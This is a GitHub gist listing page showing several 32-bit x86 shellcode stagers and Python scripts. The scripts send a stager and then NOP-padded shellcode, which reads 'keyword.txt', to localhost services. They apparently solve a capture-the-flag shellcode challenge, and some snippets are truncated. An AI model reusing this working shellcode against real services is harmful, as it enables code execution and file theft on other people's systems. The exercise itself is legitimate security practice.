Skip to content

Instantly share code, notes, and snippets.

View potetisensei's full-sized avatar

potetisensei

46 followers · 20 following
View GitHub Profile
@potetisensei
potetisensei / adhoc.s
Created November 10, 2014 17:56
BITS 32
mov ecx, eax
xor ebx, ebx
push BYTE 0x03
pop eax
push BYTE 0x7f
pop edx
int 0x80
@potetisensei
potetisensei / solve00.py
Created November 10, 2014 18:11
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10000))
stager = "\x89\xc1\x31\xdb\x6a\x03\x58\x6a\x7f\x5a\xcd\x80"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc02.s
Created November 10, 2014 18:15
BITS 32
mov ecx, eax
xor ebx, ebx
xor eax, eax
xor edx, edx
mov al, 0x3
mov dl, 0x7f
int 0x80
@potetisensei
potetisensei / adhoc14.s
Created November 10, 2014 18:25
BITS 32
push eax
xor ebx, ebx
push BYTE 0x03
pop eax
pop ecx
push BYTE 0x7f
pop edx
@potetisensei
potetisensei / solve14.py
Created November 10, 2014 18:26
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10014))
stager = "\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc09.s
Created November 10, 2014 18:28
BITS 32
push eax
xor ebx, ebx
push BYTE 0x03
pop eax
pop ecx
push BYTE 0x7f
pop edx
@potetisensei
potetisensei / solve09.py
Created November 10, 2014 18:28
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10009))
stager = "\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc10.s
Created November 10, 2014 18:30
BITS 32
nop
nop
push eax
xor ebx, ebx
push BYTE 0x03
pop eax
pop ecx
@potetisensei
potetisensei / solve10.py
Created November 10, 2014 18:31
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10010))
stager = "\x90\x90\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc11.s
Created November 10, 2014 18:34
BITS 32
push 0x80cd5a7f
push 0x6a58036a
push 0xdb31e189
push esp
ret